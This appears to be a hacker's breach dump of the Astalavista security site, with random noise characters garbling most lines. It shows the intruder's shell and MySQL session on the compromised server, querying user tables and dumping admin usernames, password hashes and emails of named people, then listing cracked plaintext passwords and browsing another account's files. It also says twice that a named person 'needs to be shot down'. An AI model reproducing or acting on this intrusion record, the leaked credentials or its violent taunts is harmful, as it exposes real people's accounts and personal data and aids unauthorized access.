<rss version=”2.0″>8 d" p7 T; O. f) b9 C7 B7 h1 \. M7 t
<channel>
% j! T0 ~" B* V <title>ASTALAVISTA.com - Exploits</title>
) J: N, V' X( R" R* O2 M <link>http://www.astalavista.com/exploits</link>
; s- v- n) [2 N6 X( Q8 W <description>All availably Exploits.</description>
' c4 H) V7 {0 K+ P <language>en-us</language>* P" N, k5 Y9 M% y, G
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>6 i' o$ {1 [+ W8 H! x
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
" m" V' i' O# L% v <generator>Astalavista.com</generator>
* C, e% L5 @ @: y <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
6 \3 H& {9 J2 d) [# |8 M </channel>
( i. ^* E( c8 k& i z</rss>’;
# l0 K" U2 G! M- }3 e6 r# O3 C u% U' x7 j4 H' j- @9 U
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {, l) V( l6 o1 ]7 F
unlink (FULLPATH . ‘/feed/exploits.xml’);
U8 y+ u. Z9 R) Y+ ~( L }- j3 [) M# G; r, q
; }( v8 q/ m5 e" h7 d+ n+ e7 R file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
" k" E6 g; T2 w h7 q% b) [! k$ e1 ?[snip]$ e& {2 P: w8 S8 I
! n3 Y( ^/ l" J8 g% X0 O0 Y% \
sh-3.2$ cat exploits.sh
- w) x0 Z( F6 Q: Y$ K, u; K) n#!/bin/sh5 M3 K2 P' m p
4 Z0 \/ k* R' C/ s: y: D###########################################################
+ `3 `/ \# _' z# a# #6 A4 C# [4 `( }
# Title: milw0rm exploits adder #; c0 `6 `+ f6 L8 G1 C
# Description: Add all milw0rm exploits to the #6 d- K& L" y5 C1 B" J
# Astalavista.com database #
5 K, x" k# Y* o$ L y+ V. g, H# #
' E& p" { w9 v' H M: T7 s# Company: Astalavista Group #' j ^: p8 i$ h( M h9 z% v8 N8 j
# Author: Paulo M. Santos #0 W. b$ m% K% j! j! q* i K( _2 K
# E-Mail: 链接标记paulo.santos@astalavista.ch #
& b2 P& w( R) f5 }# #9 X+ E' m+ U. @0 C
###########################################################
$ f. c" g2 G# F6 g* ~! l" t3 T0 H; {9 C0 w7 C! {$ n5 n0 u
# path0 a. @% H& Y# R& [
this_path=/home/com/public_html/modifications/cronjobs
, C9 ~) H3 K) O" H/ o- l, Y3 D2 \2 F- e3 f! r
# change directory
, m: L& Z9 @) s% N% n' Zcd $this_path
3 S3 L5 R$ j3 ^; [cd tmp/' Y! i& ^5 u8 ^: R* J
! f8 v8 C& r+ M$ N1 e! A/ `
# delete files3 T0 h6 r8 i$ |5 @+ N3 J8 S
rm -rf milw0rm.tar.* &
: Y% B* j) O5 e. s) b( {6 orm -rf milw0rm/ &
# C! X' W2 [6 V4 f5 Y
/ {; X8 X! ~0 }7 E# wget milw0rm paket
. U3 E8 i: [5 \) qwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]' y# l- P6 e+ J$ ?: b) l' S. o4 P
" j; T8 t+ A& j1 ?: Q: K" u9 x
# extract milw0rm paket. S# _: s) C& S* I
tar -xvf milw0rm.tar.bz2
{/ M* ^2 b4 I( D# M P" z" p. h6 V' u3 j
# change owner
) `! c$ d# g# W2 C5 ?chown -R com .) J% f# w' z" j5 ]
chgrp -R com .
$ A5 {9 @$ h8 l1 e9 O0 \
) ^1 ?9 Z$ i! Y4 J4 f# execute php script$ V* b5 |( d3 [6 |( t
cd $this_path& J! h+ a* @8 t2 {$ i
php -q exploits.php
; |% m/ {5 P: C! z: L) i6 @: X. o) q, o0 \
# delete files
! }6 y/ _$ ]: t' j hrm -rf tmp/milw0rm.tar.*
1 M) P/ ]! o% Q! M1 crm -rf tmp/milw0rm/" w9 q9 l) |5 w# z
' b) X' \2 _: a- Q0 \, ush-3.2$ echo “Paulo M. Santos needs to be shot down.”
# Q* Q, |/ j, TPaulo M. Santos needs to be shot down., e% T+ c2 W8 u* v6 \$ r! r
5 ]- _$ J% @' ^+ j# M4 P) ^mysql -u contrexxuser2 -p8 D% _2 V' H/ V6 o6 a) g' o _7 k
Enter password:% s- C' Y2 S, Q6 E4 |- H( D
Welcome to the MySQL monitor. Commands end with ; or \g.0 } n4 B$ b3 T' r
Your MySQL connection id is 2616942 o0 Z$ d& _4 B" Y$ Z3 ]% u9 q. x
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
, f, q- x) J0 u6 N$ I' c0 t6 a2 P
; t! a. N, M; {( L. TType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( h3 F% Z$ O, |* a( w
3 P/ L% Z; @1 x# o: f* d# J8 ]; J3 mmysql> show databases;
1 s1 [9 L8 }% w+ Z& r+——————–+
& K% `: h4 p3 c, H& Z| Database |0 g4 t* G7 ?0 E! ?8 M* |7 t2 y: k
+——————–+
A" ^( p& g" X1 x$ N3 E| information_schema |
0 }/ n# ] [3 W5 m& h0 E| com_contrexx2 |
% o9 c, j; }' A9 W8 i) U3 w! j| com_contrexx2_live | M% p ~ k' i7 g( n
| test |4 N) V% `' w4 M a& {* Z7 u! [4 @
+——————–+
- r. g2 h- |, I$ T3 I4 rows in set (0.00 sec)4 ?2 l' Y! C9 I/ ?- ]
3 _; Z- N5 S N$ F8 y1 \7 O# pmysql> use com_contrexx2_live
. \( W8 h% g+ EDatabase changed! R \4 y; q* S9 B. c5 y0 q) {5 F
mysql> show tables;
, g2 W5 J" t; D3 m& j3 |+————————————————–+
0 h) C5 o: k5 W& _7 f| Tables_in_com_contrexx2_live |; v8 V/ J) k u; ^5 |% q
+————————————————–+
6 ~- J9 w/ }% c5 ]0 `- D5 w5 G* n| cc_banner_counter |
1 w- G" h$ n4 h8 L* ]6 V| cc_search_counter |
: o; O y9 y% A| contrexx_access_group_dynamic_ids |, G3 R3 \! D4 r9 O, e* v
| contrexx_access_group_static_ids |
) _5 Z: J% q, M, o/ E$ y7 r9 E" ?+ E| contrexx_access_rel_user_group |" s4 n9 d- Z. @
| contrexx_access_settings |0 c/ i$ Z5 e6 N p& M2 l) U
| contrexx_access_user_attribute |
Y$ z( o/ i, ?5 q$ M* [7 m| contrexx_access_user_attribute_name | b/ ]5 G! @: K5 d: U! |& M
| contrexx_access_user_attribute_value |
# c8 D5 i6 _8 q& w; X- Y| contrexx_access_user_core_attribute |
+ s) }1 m) y5 E| contrexx_access_user_groups |
2 l5 z v+ n, T& e4 k0 m+ {: F$ M| contrexx_access_user_mail |
' |; G6 K0 T% A7 p4 I0 Z4 h4 d0 R| contrexx_access_user_profile |. m( A* V0 n C7 |( R+ M7 p
| contrexx_access_user_title |
5 _8 x; o) a4 `$ X- s| contrexx_access_user_validity |# {* W( ~6 ~) `1 g! B
| contrexx_access_users |
( v! ~4 O2 Z+ U8 h| contrexx_backend_areas |
" Z, G& H/ b" J3 h& F ^ N e* `) q7 ^| contrexx_backups |/ Q2 c" M: H B7 w" f
| contrexx_content |
3 j9 k2 x6 S) Y$ \1 v3 F| contrexx_content_history |
2 D' d7 G k, {1 g3 e7 |! L| contrexx_content_logfile |* y. a& ?3 s n( I5 t- C
| contrexx_content_navigation |
! [3 B; c2 Q6 }( V% D- H4 d" H/ A. F| contrexx_content_navigation_history |
3 o2 T8 A4 @' R$ m# {| contrexx_ids |2 C9 X4 U# R" m0 g' h7 h
| contrexx_languages |
1 x0 l8 u* Q* t0 [# f: S. J: a| contrexx_lib_country |
L L2 x7 s. f8 ~5 H| contrexx_log |
+ O! j+ w7 u! |7 }% }% j| contrexx_module_alias_source |5 @* V' b6 l8 v; L) [% X
| contrexx_module_alias_target |. d% t, h1 K; F# J B" y
| contrexx_module_block_blocks |- Z8 o6 @. y& N% D
| contrexx_module_block_rel_lang |
1 P7 r% K$ j8 S. I| contrexx_module_block_rel_pages |# L! a* L1 Q. g3 S5 Q/ u
| contrexx_module_block_settings |- ~3 o9 j2 H8 G. H `" c
| contrexx_module_blog_categories |* i8 U: U' K0 F7 s; U
| contrexx_module_blog_comments |3 I$ `& E' L, Q$ M0 Z1 v0 [9 t
| contrexx_module_blog_message_to_category |
9 x) P8 D; r$ y# Y& I* q' Y| contrexx_module_blog_messages |
+ H' C' d" g3 {! Y7 x- I| contrexx_module_blog_messages_lang |
% U8 X U$ o: s1 _| contrexx_module_blog_networks |6 x+ e+ f; H! g! M3 A
| contrexx_module_blog_networks_lang |
; R6 K, L6 B$ Y4 t8 G* T+ L| contrexx_module_blog_settings |0 b$ y8 h7 N# i
| contrexx_module_blog_votes |
' D% T/ y- e( U% e( Y| contrexx_module_calendar |% i0 U3 o E/ y# g' ^" g S# m! n) y
| contrexx_module_calendar_access |3 o8 O3 e' M% n8 [) Y, n
| contrexx_module_calendar_categories |
# R. s5 A% ~! }" W| contrexx_module_calendar_form_data |) F2 p+ p6 I; a0 B4 @
| contrexx_module_calendar_form_fields |/ w% S* E( Q5 N# B# y8 W
| contrexx_module_calendar_registrations |6 g4 x; @( `" X* U- c" i @7 R
| contrexx_module_calendar_settings |5 A. i) ~+ N4 q1 ^
| contrexx_module_calendar_style |- g. r* ?+ @2 `1 c9 _$ ~ r
| contrexx_module_contact_form |/ P2 a% V+ b- Q
| contrexx_module_contact_form_data |1 z5 g& M, g9 L2 ^2 R, |2 D
| contrexx_module_contact_form_field |
0 {, Z5 G$ N; O6 p% ?) |$ D| contrexx_module_contact_settings |& `5 g4 N3 E! Q: l% \% p# H/ q& d
| contrexx_module_data_categories |
( K, \! i9 d' j% |% X8 f| contrexx_module_data_message_to_category |
4 p3 n% K! W+ i6 p+ Y* o- y7 d! C| contrexx_module_data_messages |; p' {9 o; O+ a% S4 @, s
| contrexx_module_data_messages_lang |7 M% G& j% D" V2 l7 K3 `0 }5 V. y
| contrexx_module_data_placeholders | q2 }% R" F/ S, N8 G4 Z p6 a
| contrexx_module_data_settings |
9 L; y+ Q( ]* R$ N# h| contrexx_module_directory_access |/ a; I: U) V- L' k& s
| contrexx_module_directory_categories |4 Y2 V n2 X; g4 \( q4 |0 p- l# l
| contrexx_module_directory_dir |
1 G* H1 P9 y0 ]| contrexx_module_directory_inputfields |3 W5 {& |3 x- e4 ~
| contrexx_module_directory_levels |
& A3 D3 T+ i! k, x& x0 v6 s% F| contrexx_module_directory_mail | ^# ~' R$ M7 P9 }/ Q
| contrexx_module_directory_rel_dir_cat |7 X4 L2 f; Z' A8 N5 J, E
| contrexx_module_directory_rel_dir_level |7 @9 Z2 K) J6 K2 q ^
| contrexx_module_directory_settings |/ B* V7 U6 w5 H$ R# u. L- V- x
| contrexx_module_directory_settings_google |/ o6 ^: \" u% r/ l
| contrexx_module_directory_vote |
: Y" ]( [6 M' _6 ^- ?| contrexx_module_docsys |, ]* V R }0 a" z* a
| contrexx_module_docsys_categories |- U: S$ ]9 [/ U* u: J
| contrexx_module_egov_configuration |7 G0 P# B \8 y6 E. K% X2 ^* d
| contrexx_module_egov_orders |3 R" i5 s+ v. @: `7 o4 N
| contrexx_module_egov_product_calendar |
, T: l( U8 z1 U/ {( p1 g6 B| contrexx_module_egov_product_fields |8 Y. Y( c$ S5 o, f% N8 R% K# n6 t
| contrexx_module_egov_products |6 V/ _! u4 N+ p0 ^( ]
| contrexx_module_egov_settings |
% F S) E( Y o( V3 b- S| contrexx_module_exploits |
4 Q6 [# D. M- _5 B# ~| contrexx_module_exploits_categories |5 A: A; u! L4 t0 X% J
| contrexx_module_feed_category |
' B9 k$ N! W7 a! I| contrexx_module_feed_news |( [- f+ H% Z/ N- R
| contrexx_module_feed_newsml_association |
8 x: \4 C; L2 @$ M! N9 v5 s8 H# o! o| contrexx_module_feed_newsml_categories |
/ V% h) K) R+ L0 I2 G| contrexx_module_feed_newsml_documents |* \, H: U! R+ b3 h( R
| contrexx_module_feed_newsml_providers |( S" g* M, H7 e7 w, e
| contrexx_module_forum_access |/ L4 j5 W, ` e# @5 T/ \- |/ _2 r
| contrexx_module_forum_categories |
" l T" D; }7 ]2 M5 O| contrexx_module_forum_categories_lang |# W, u3 c6 _' y$ A& i4 y. S# w
| contrexx_module_forum_notification |
3 g2 B- R; m/ {2 s| contrexx_module_forum_postings |! S N/ @2 w/ o* _# W1 _
| contrexx_module_forum_rating |
" {. y( g2 G; x| contrexx_module_forum_settings |: ` S+ s: c5 [/ P# m; }
| contrexx_module_forum_statistics |
7 q; y0 T# M& _: p' `| contrexx_module_gallery_categories |
0 l7 \: {7 M' [: }| contrexx_module_gallery_comments |
. X$ K8 s( l- }: C5 i| contrexx_module_gallery_language |
: z/ K8 r# n! |8 K4 z: j| contrexx_module_gallery_language_pics |& z% C; w& k9 ]% l
| contrexx_module_gallery_pictures |
/ M; j) I6 O# Y. b! }$ T| contrexx_module_gallery_settings |$ v# |) D0 z5 j8 G- D
| contrexx_module_gallery_votes |
& U. a; Q$ f6 Z0 J' P) `! B6 s| contrexx_module_guestbook |8 Z6 y) J w7 l1 ~
| contrexx_module_guestbook_settings |; V3 H( T% C& `' d6 s5 }1 k: p% J( c
| contrexx_module_livecam |
2 z! u) |4 w4 R: k a| contrexx_module_livecam_settings |
* S; f M/ \7 M! I" V| contrexx_module_market |
9 r& F! |) J \| contrexx_module_market_access |/ b9 S, [+ S) `& j/ s
| contrexx_module_market_categories |
. P" @& v0 l5 s4 |- X" L- C3 X" A| contrexx_module_market_mail |% e/ g- y/ i0 `+ u1 T6 D# i; B
| contrexx_module_market_paypal |
3 ~* E# b2 d" M5 V+ P0 t. B- n J+ [* V| contrexx_module_market_settings |
~( F2 f4 ~: u* y+ D- ^# o| contrexx_module_market_spez_fields |) ?. m3 j$ }; {- e4 X
| contrexx_module_mediadir_access |
* m, b: x5 p8 I1 W| contrexx_module_mediadir_categories |
( u }; j+ z% U! u1 I| contrexx_module_mediadir_comments |6 O7 Z6 w! k7 F" B# V' q; U% X
| contrexx_module_mediadir_dir |
V; @# \) J j# \0 O/ X) ^| contrexx_module_mediadir_inputfields |5 k( g e0 L0 s0 J) R& Z
| contrexx_module_mediadir_levels |4 D7 x% C9 v. D8 E, X* x
| contrexx_module_mediadir_mail |
5 l, ^7 f- O; f8 N2 a& {| contrexx_module_mediadir_rel_dir_cat |& d# Z, y$ g1 s% e; I1 e6 O
| contrexx_module_mediadir_rel_dir_level |
) @. C- D+ ^; x; [* c) d4 S| contrexx_module_mediadir_reports |/ I: z( i. j2 `
| contrexx_module_mediadir_settings |" g" |7 O. M0 d+ V/ n, y, J! y
| contrexx_module_mediadir_settings_google |
6 u r# j8 v: Z2 P! b| contrexx_module_mediadir_vote |5 F( C6 P Q1 m' g
| contrexx_module_memberdir_directories |- ?& S' |8 d+ T m# i
| contrexx_module_memberdir_name |! g9 H9 r Y; q; q
| contrexx_module_memberdir_settings |+ D7 i/ |# }( q. d1 d
| contrexx_module_memberdir_values |5 {& ]3 u1 J, o( z
| contrexx_module_nettools_allowed_groups |0 s9 n, M8 [/ q/ r7 i# |- i& e
| contrexx_module_nettools_settings |( w- h+ Y% [0 |0 O/ p( {
| contrexx_module_news | |& r9 \* }' R# w+ a+ m
| contrexx_module_news_access |
0 F( u9 E* i$ M. V5 u3 h; L| contrexx_module_news_categories |# `* G: k V$ M! t! E8 e3 v
| contrexx_module_news_settings |0 L2 D t; n- J' s5 V4 e6 n
| contrexx_module_news_teaser_frame |
% z) F" ]0 D$ B8 v1 {! c# w| contrexx_module_news_teaser_frame_templates |% h# J* `% Z0 F6 Y
| contrexx_module_news_ticker |
9 c: Y- v! ?, N. w0 ?. u7 d8 @| contrexx_module_newsletter | `# Q) q" S/ m/ [
| contrexx_module_newsletter_attachment |+ j' |6 w* M- d
| contrexx_module_newsletter_category |* w! S) Y0 v( M) y6 B8 Q
| contrexx_module_newsletter_confirm_mail |
/ Q' z, B( o+ _; B Z& w6 }0 Z| contrexx_module_newsletter_rel_cat_news |4 F. p$ x. {2 }/ @8 G; m
| contrexx_module_newsletter_rel_user_cat |& R2 G" V5 d' n/ s( O: `0 v
| contrexx_module_newsletter_settings |2 N$ `6 L) [4 ^7 v: h. C
| contrexx_module_newsletter_template |
9 d, z( s/ ~5 `- {| contrexx_module_newsletter_tmp_sending |9 g a, o1 N) N$ A
| contrexx_module_newsletter_user |' o9 p" H6 A5 k6 a# p$ n" _3 v
| contrexx_module_newsletter_user_title |, z: u |. f2 N; s% W
| contrexx_module_onlinetools_defaultports |
; w& F9 k8 Z5 _6 P% A| contrexx_module_onlinetools_defaultports_back |
. v4 r6 Q" w: `1 t' Y8 f) n7 k| contrexx_module_onlinetools_geolitecity_blocks |
l& R5 B( r- a- {3 w, R% w, Y" e| contrexx_module_onlinetools_geolitecity_country |! i; x- w P- b( f, F4 {
| contrexx_module_onlinetools_geolitecity_location |# ^& y w% `+ Z$ [. k" s
| contrexx_module_podcast_category |. _$ {2 a" n- K) s; s- @$ V$ v$ Q
| contrexx_module_podcast_medium |
* e3 M! y# w0 {9 `| contrexx_module_podcast_rel_category_lang |1 h( x- u8 E" g5 Q' |0 ^- W6 O' X
| contrexx_module_podcast_rel_medium_category |# F ~- J8 X5 P+ s3 a. e& F0 c2 Y4 t
| contrexx_module_podcast_settings |. D! Z* O% a/ q( M0 | U) v
| contrexx_module_podcast_template |
9 a w4 k: e+ D5 _| contrexx_module_proxydb |* K" X w, |1 E4 D, b# u$ p
| contrexx_module_recommend |- u9 U& J( g% q% ?; @
| contrexx_module_repository |% X) A2 L! E5 B$ o7 T4 e+ `
| contrexx_module_securitynews_cats |
3 a- r3 p$ L/ T, |3 l7 q| contrexx_module_securitynews_feeds |6 I9 H/ i/ ]: P2 b. H0 p) ~
| contrexx_module_securitynews_news |
& O+ ?# E$ C3 a9 p3 r) S* [8 W| contrexx_module_shop_categories |
4 h7 k C, p& E$ g% m7 Z| contrexx_module_shop_config |
8 A7 w& }$ F4 K* c| contrexx_module_shop_countries |
' F$ S9 t% C, e| contrexx_module_shop_currencies |) g! U& c' R8 g* Q1 s) |
| contrexx_module_shop_customers |
9 _2 \2 {7 \. o T D/ k( r" h. u| contrexx_module_shop_importimg |0 q \7 ^! A0 n* H$ ?
| contrexx_module_shop_lsv |
( [$ y* ]. U5 p) |1 ?| contrexx_module_shop_mail |
& f, y8 L2 n" F1 B' ^ b| contrexx_module_shop_mail_content |( r3 a' t% c; f' A
| contrexx_module_shop_manufacturer |7 d# ?, T4 {* m, k; @
| contrexx_module_shop_order_items |
1 @5 j8 ]( P5 ?$ R; h5 a5 L| contrexx_module_shop_order_items_attributes |
: z% X( l, z3 I| contrexx_module_shop_orders |1 ?+ e8 N2 u, v1 R1 n7 N3 k
| contrexx_module_shop_payment |
# t7 C) J, S( F8 X* t5 v- I| contrexx_module_shop_payment_processors |
- L; Z- C) \! F! k7 K! y| contrexx_module_shop_pricelists |
; d2 F% B, W2 f& ?; t$ U; x| contrexx_module_shop_products |" a/ \! y9 O8 S& s
| contrexx_module_shop_products_attributes |2 ~1 g" _9 Z0 \9 o' \4 h
| contrexx_module_shop_products_attributes_name |- I8 F6 y/ i" a
| contrexx_module_shop_products_attributes_value |1 E R) Q% K$ w1 {% ~
| contrexx_module_shop_products_downloads |( A) G( L% |, _* o. Q2 B
| contrexx_module_shop_rel_countries |& N5 K7 |# w: J/ o
| contrexx_module_shop_rel_payment |4 l3 ^% ?$ |, G- C$ S) s
| contrexx_module_shop_rel_shipment |1 b3 E7 {; D+ ~. a: i* P
| contrexx_module_shop_shipment_cost |1 q/ L) r% y: e/ v6 X
| contrexx_module_shop_shipper |
6 H& i' Y9 G+ N8 e; Y7 j| contrexx_module_shop_vat |
( P2 r% D% o: S; e+ E/ `2 l6 ^| contrexx_module_shop_zones |5 `; j0 |0 g" U: S
| contrexx_module_u2u_address_list |' G# ?% y o" d/ _
| contrexx_module_u2u_message_log |/ |7 t" ~ u8 [( D5 a
| contrexx_module_u2u_sent_messages |) k0 v. {' g0 H2 s: I- p7 J* v* U
| contrexx_module_u2u_settings |) M! Y) n! B, H# J- ?
| contrexx_module_u2u_user_log |
9 p6 G2 M0 Q* v| contrexx_modules |
* P6 H6 E) [0 a5 u| contrexx_sessions |
5 A& J0 F" { B$ y| contrexx_settings |
# N& v: V( G+ `. J| contrexx_settings_smtp |0 k$ E0 c w3 D {% n9 {; X8 x
| contrexx_skins |! i' Z, ^. X z' i0 K
| contrexx_stats_browser |
- j- ~' n0 K( @( Y% v| contrexx_stats_colourdepth |
# g: f2 G T6 R( K| contrexx_stats_config |2 N' J! P% [' a+ E% R. c
| contrexx_stats_country |
( }1 K. R8 F5 y3 p| contrexx_stats_hostname | e) h, }+ u/ H, C
| contrexx_stats_javascript |0 a& T) ^' _& N# A
| contrexx_stats_operatingsystem |) h% x; e) d5 u {
| contrexx_stats_referer |. T/ I A- d; F8 F$ v( t: ^, g
| contrexx_stats_requests |
0 ~8 Z) M$ D' i: v1 Y| contrexx_stats_requests_summary |* ~/ e2 i. m8 T9 w5 ]: [5 y+ V# R! u/ A
| contrexx_stats_screenresolution |1 }" n7 `% L. Y" L, X6 x
| contrexx_stats_search |
6 |8 H8 B0 a$ H! ^9 p! P2 T| contrexx_stats_spiders |. u1 l9 i- _* c) l! J0 B3 T+ N
| contrexx_stats_spiders_summary |4 f6 @0 ?8 Q3 Z
| contrexx_stats_visitors | R; ~! b% w, L0 W$ ?
| contrexx_stats_visitors_summary |
) u% d- j& w6 l) E) ^" q/ E1 F! ^| contrexx_voting_additionaldata |
& d1 H0 d4 q |$ V. I5 C| contrexx_voting_email |- E9 I! R" r5 {, u; T
| contrexx_voting_rel_email_system |) {7 D, X) T3 ]4 e( f0 }. H
| contrexx_voting_results |! k2 q5 G$ W& C& g1 ?2 z, c
| contrexx_voting_system |
: J6 M# c! q: q; y+ R| foo |1 U5 h9 p! e9 F
+————————————————–+5 O3 r: N8 e& m4 {
227 rows in set (0.01 sec)
+ C3 F7 ~* p4 @* e: g7 h7 k- ]8 J( `* u
mysql> select count(*) as skids from contrexx_access_users;: t" Q9 e: p8 N2 y$ \
+——-+
( @3 O7 I( a. B$ e/ h( Q| skids |2 o) H! F' _5 L( @
+——-+2 d: {; m6 j' h; e
| 53699 |
: }& K2 ]7 N, y+——-+
& h- p. a5 P0 E, ^- ?1 row in set (0.00 sec)
0 W. M9 E8 Z# z2 _" d6 ]% P: k+ x @* H2 Q0 I3 e$ I
mysql> describe contrexx_access_users;. v( e# V, x! Z1 m) h- ?+ H6 d
+——————+——————————————+——+—–+————–+—————-+
* T/ t+ S1 s+ X% z: m- u| Field | Type | Null | Key | Default | Extra |; u7 m4 w6 {9 c' ^% g6 G% J
+——————+——————————————+——+—–+————–+—————-+# z9 N) X% E9 e
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
" f# k8 _ y+ Y2 D: A/ W3 W| is_admin | tinyint(1) unsigned | NO | | 0 | |
# k! k8 a. J+ q# z" F' W; r! K| username | varchar(40) | YES | MUL | NULL | |
7 {, S) c$ R* N( b- L| password | varchar(32) | YES | | NULL | |+ Y+ S3 D; b0 S/ n
| regdate | int(14) unsigned | NO | | 0 | |# P# G1 l5 I% P7 }
| expiration | int(14) unsigned | NO | | 0 | |+ g% f3 @1 z, R$ P7 Q
| validity | int(10) unsigned | NO | | 0 | |
9 M7 @; F: W- \7 S! U' }, X+ a| last_auth | int(14) unsigned | NO | | 0 | |. [+ o- R G" h' ?+ i
| last_activity | int(14) unsigned | NO | | 0 | |
) j0 S$ }- j9 }0 n| email | varchar(255) | YES | | NULL | |# y. S7 U. }9 y c& k6 U+ W
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
7 m8 X: u2 O+ J0 S6 r# s| frontend_lang_id | int(2) unsigned | NO | | 0 | |
; d) s: a3 S6 _$ b| backend_lang_id | int(2) unsigned | NO | | 0 | |* N8 Z0 K, ]+ l; F
| active | tinyint(1) | NO | | 0 | |
% u# v. G5 b# F. j8 u0 l- h| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |! p7 P1 i: P/ h
| restore_key | varchar(32) | NO | | | |9 Q& a" V8 ?9 A0 Y: _: P
| restore_key_time | int(14) unsigned | NO | | 0 | |
! G! l1 B2 O( i0 m$ p q| u2u_active | enum(’0′,’1′) | NO | | 1 | |
1 R+ |' C6 s3 M x4 M9 N3 Q+——————+——————————————+——+—–+————–+—————-+
( s% J1 [- k; ~/ o18 rows in set (0.00 sec)8 U* m3 [+ A$ A2 d; l% d2 V
7 @2 S: M1 V: G( U" ^6 ^8 Vmysql> select username,password,email from contrexx_access_users where is_admin = 1;' R% K5 c9 D; t: _4 L( {
+————+———————————-+—————————–+
2 I( ?6 e0 E( s4 E4 ^( E. ?% q| username | password | email |( ~+ E" b' e4 I4 t7 r% u+ |* U2 ]4 ^9 a
+————+———————————-+—————————–++ u/ f- x3 D2 ~2 {$ @
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |+ e8 V( N& k Z7 X8 m
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
! L' g& t P# P0 L% f) h6 I| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
/ g, c. K ]0 F8 H| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |9 G1 C. p, d5 R+ c( A
+————+———————————-+—————————–+
& T9 J5 n4 V! W* H( [' e! a4 rows in set (0.04 sec)' R I$ O2 P3 Q- x/ ?/ t4 h) g
$ n2 W3 p/ t$ J
mysql> exit;
; o, C& E8 C7 Q" w# f2 _Bye# f' L+ ]# @8 d3 \# n' d U
; A e k2 t% J; [$ f$ _
[~] There you go, your “team of security and IT professionals” is a joke.6 V6 K$ c7 D( g- \$ V6 n
# f4 g7 _/ s) v: `6 y: I: M2 `0 K
+——————————+- E, T/ a9 ]( g$ @' D$ Y1 k" W2 @4 l
system:f82BN3+_*5 o( r. e3 k" l+ X s$ g
Be1er0ph0r:belerophor4astacom
G) c0 I8 G3 q! c0 \2 g2 iprozac:asta4cms!
- n) ^6 N8 K( T) S4 `$ hcommander:mpbdaagf6m
1 `9 X" Q: |+ X* ]8 h- F1 ysykadul:ak29eral5 H" |9 d/ ]4 y5 B8 s$ S8 W- w
+——————————+9 v# n7 x6 l0 u" U* c' L! h
8 p+ w- B! C3 _) w[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
4 Q% l2 P4 h4 m…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.. b4 @! j3 N' D' z% o8 o9 M
1 T+ Y' ~0 ?3 Z5 Q4 C" y" g; f
[~] Lets move to astalavista.net now,
# M) k, I5 }2 U
- J: D/ H3 j( sFrom <链接标记[url]https://www.astalavista.net/[/url]>:
_+ u8 @" z B; u) m& B>> Everyone knows that the best defense is a good offense.: y0 _' j+ F) y6 p9 m% u }6 e
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
: `; O. W4 W. T( g8 M5 C1 X>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
2 v) y* ?, y, y9 q( i& `>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”2 R5 g) X2 S: P& a, `
: E! \* V9 q* F, d: y" U6 i. w>> Go ahead, try and hack our server . in a completely legal way!
7 s6 Y9 ^! }* \) u/ a& q6 s' k>> Learn by doing: We offer our members tricky tasks and challenges on an
0 E1 {9 r8 ^" a1 [# b$ _>> ongoing basis so you can test your knowledge and abilities. You can also: `0 A' Z: K1 A- i3 S) E
>> demonstrate what you.ve mastered by taking part in regular hacker contests5 E1 R: V7 M) a5 u3 h* f+ @
>> and war games
1 [1 m. Z( l U: [; }2 C2 y
, }1 U; z3 w# W2 M; j[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
y8 A; a: h" O. M- T
* a0 g C h% X/ o[-] Tricky task: Find home dir of astalavista.net8 A( N; `& D k' T/ |3 ~0 |1 A
8 L. j6 S E% I; M7 S
sh-3.2$ ls -la ~astanet
2 v! m |7 a" ytotal 48
$ X" o' `" Z9 J4 O: Ddrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ." z! A U" Z3 z: \
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 z1 Y% j7 _) K* f" J
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth5 f- z" J4 u. O' q7 z; l% q
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history& A+ B8 Q. B7 W
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout$ Y5 `, o, P- C$ Y7 Q
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile& ^. @4 G! x6 W% O+ W k: O) i
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
7 G; H) O' f0 S8 `5 Cdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
4 R8 n, k/ E" S! C8 O/ b, {drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
: F" e, Q0 A& W9 M' ~! Ddrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail+ s! u( {. I5 R% V( s' @
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html2 S% {9 z3 O2 u6 ~! l$ `8 I
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
) T* u0 y+ V6 J& X8 L. b- |3 j, S: K, W- X
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
( Y: B' w$ P& e; x2 M: |sh-3.2$ ls -la; r* ~; C% y- l* x
total 200
4 X3 y) R( c3 \drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
